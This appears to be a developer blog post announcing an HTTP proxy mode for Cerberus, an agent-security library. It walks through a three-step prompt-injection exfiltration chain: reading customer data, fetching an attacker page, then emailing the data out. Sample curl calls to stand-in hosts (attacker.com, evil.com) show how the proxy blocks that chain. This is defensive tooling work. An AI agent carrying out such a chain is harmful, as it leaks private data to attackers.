Zero-Code-Change AI Security: Cerberus Now Runs as an HTTP Proxy

#security #ai #opensource #cybersecurity

Most security tooling asks you to change your agent's code. Wrap this, extend that, swap your tool executor. If you're deep in a LangChain or OpenAI Agents setup that's already running in prod, that's friction.

New in Cerberus: proxy/gateway mode. Same detection, zero changes to your agent.

How it works

Instead of wrapping your executors with guard(), you spin up a Cerberus proxy and route your agent's tool calls through it:

import { createProxy } from '@cerberus-ai/core';

const proxy = createProxy({
port: 4000,
cerberus: { alertMode: 'interrupt', threshold: 3 },
tools: {
readCustomerData: {
target: 'http://localhost:3001/readCustomerData',
trustLevel: 'trusted',
},
fetchWebpage: {
target: 'http://localhost:3001/fetchWebpage',
trustLevel: 'untrusted',
},
sendEmail: {
target: 'http://localhost:3001/sendEmail',
outbound: true,
},
},
});

await proxy.listen(); // port 4000
Your agent calls POST http://localhost:4000/tool/sendEmail with { "args": {...} } instead of calling the tool server directly. That's the only change.

What the proxy returns

Allowed call:

200 { "result": "Email sent to user@company.com" }
Lethal Trifecta detected (L1 + L2 + L3 fires):

403 { "blocked": true, "message": "[Cerberus] Tool call blocked — risk score 3/4" }
Plus X-Cerberus-Blocked: true header.

The thing that makes this work: session state

The Lethal Trifecta attack pattern isn't a single call — it's a sequence. Turn 1: agent reads private customer data (L1). Turn 2: agent fetches an attacker-controlled page that contains an injection (L2). Turn 3: agent sends an email to an external address with that data in the body (L3). Score hits 3/4. Blocked.

In proxy mode, each agent run sends a X-Cerberus-Session header. The proxy maintains independent detection state per session ID, so cumulative scoring works across multiple HTTP requests from the same run. The attack pattern is detected whether you're using guard() inline or routing through the proxy.

curl -X POST http://localhost:4000/tool/readCustomerData \
-H "X-Cerberus-Session: run-abc123" \
-H "Content-Type: application/json" \
-d '{"args": {}}'

200 — score 1/4

curl -X POST http://localhost:4000/tool/fetchWebpage \
-H "X-Cerberus-Session: run-abc123" \
-d '{"args": {"url": "https://attacker.com/payload"}}'

200 — score 2/4

curl -X POST http://localhost:4000/tool/sendEmail \
-H "X-Cerberus-Session: run-abc123" \
-d '{"args": {"to": "audit@evil.com", "body": ""}}'

403 — score 3/4 — BLOCKED

Under the hood

Pure node:http — zero new dependencies
GET /health → { "status": "ok", "sessions": N } for monitoring
Sessions auto-expire after 30 minutes of inactivity
Supports HTTP upstream targets or local handlers (useful for testing)
733 tests, 98%+ coverage
The proxy joins guard() (inline wrapping) and the framework adapters (LangChain, Vercel AI, OpenAI Agents) as a third integration path. Pick the one that fits where you are.

Repo: github.com/Odingard/cerberus
npm: npm install @cerberus-ai/core